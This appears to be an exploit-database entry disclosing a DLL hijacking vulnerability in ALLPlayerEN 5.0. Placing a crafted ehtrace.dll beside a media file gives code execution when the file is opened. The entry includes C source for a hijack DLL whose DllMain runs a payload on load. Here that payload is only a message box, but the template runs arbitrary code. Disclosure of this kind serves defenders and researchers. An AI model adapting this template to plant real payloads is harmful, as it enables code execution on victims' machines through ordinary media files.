ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

/*


Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

Date: 2012-3-25
Author: instruder
Software Link: http://www.allplayer.org/zh/download/allplayer
Version: ALLPlayerEN 5.0
Tested on: win7
CVE : N/A



Desc: ALLPlayer Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mp3, .rmvb .avi and so on thru
ehtrace.dll
library

Vulnerability discovered by instruder have for fun.


*/

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}